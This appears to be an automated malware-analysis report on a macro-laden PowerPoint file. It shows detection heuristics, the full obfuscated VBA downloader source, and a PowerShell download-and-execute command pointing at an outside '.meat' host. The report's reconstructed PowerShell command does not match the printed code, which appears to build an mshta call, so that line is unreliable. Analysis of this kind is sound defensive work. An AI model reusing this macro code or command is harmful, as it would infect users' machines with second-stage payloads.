MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1106 Native API
The OOXML document contains VBA macros that are triggered by the Auto_Close subroutine. The script uses CreateObject to instantiate a Shell object and then executes a command. The reconstructed command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://xxx.meat/mp\')"', indicating it downloads and executes a second-stage payload from the specified URL. This suggests a downloader or droppper functionality.
Heuristics 4
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Dope = CreateObject(magoog + magoog1) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Public Sub Auto_Close()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1796 bytes |
SHA-256: fe78a6079a210b9db4f5cce33468cca1b5950ece5a3449731ecc4f591b63edbf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Function Alive_0()
Dope.Exec xxx + Alive_4 + Alive_5
End Function
Attribute VB_Name = "Module2"
Function magoog()
Dim John As String
John = Right("Sachin sd4dssecript", 5)
magoog = "W" & String(1, "S") + John
End Function
Attribute VB_Name = "Module3"
Function magoog1()
magoog1 = ".She" + String(2, "l")
End Function
Attribute VB_Name = "Module4"
Public Sub Auto_Close()
Alive_0
End Sub
Attribute VB_Name = "Module5"
Function Dope()
Set Dope = CreateObject(magoog + magoog1)
End Function
Attribute VB_Name = "Module6"
Function Alive_1()
Alive_1 = "m"
End Function
Attribute VB_Name = "Module7"
Function Alive_2()
Alive_2 = "s"
End Function
Attribute VB_Name = "Module8"
Function Alive_3()
Alive_3 = String(1, "h")
End Function
Attribute VB_Name = "Module9"
Function Alive_4()
Dim Okk As String
Okk = Replace("3asd3asd", "3asd3asd", "t")
Alive_4 = Okk + "a "
End Function
Attribute VB_Name = "Module10"
Function Alive_5()
Dim Yeye As String
Dim ssnd, ssne, chiken, egg, dawg As String
chicken = "@j.meat is good i love chiken"
egg = Left(chicken, 3)
Yeye = Mid("example httmxt", 9, 3)
ssnd = " asj4jsb349al2pasn3 "
ssne = Trim(ssnd)
dawg = Replace("Iloveluxury", "Iloveluxury", "mp")
Alive_5 = Yeye & "ps://%69%69%69%69%69%69%" & "69%69%69%69%69%69%6" & "9%69%69%69%69%69%69%69" & egg + dawg + String(1, "/") & ssne
End Function
Attribute VB_Name = "Module11"
Function xxx()
PDF1 = Alive_1
PDF2 = Alive_2
PDF3 = Alive_3
PDF4 = Alive_4
PDF5 = Alive_5
xxx = PDF1 + PDF2 + PDF3
End Function
Attribute VB_Name = "Module12"
Sub RIGHT_Example()
Dim John As String
John = Right("Sachin sd4dssecript", 5)
MsgBox John
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 45056 bytes |
SHA-256: a3e3f5c374d1c60ea201414195cf6c369486fb76132a94b8f644247017800790 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.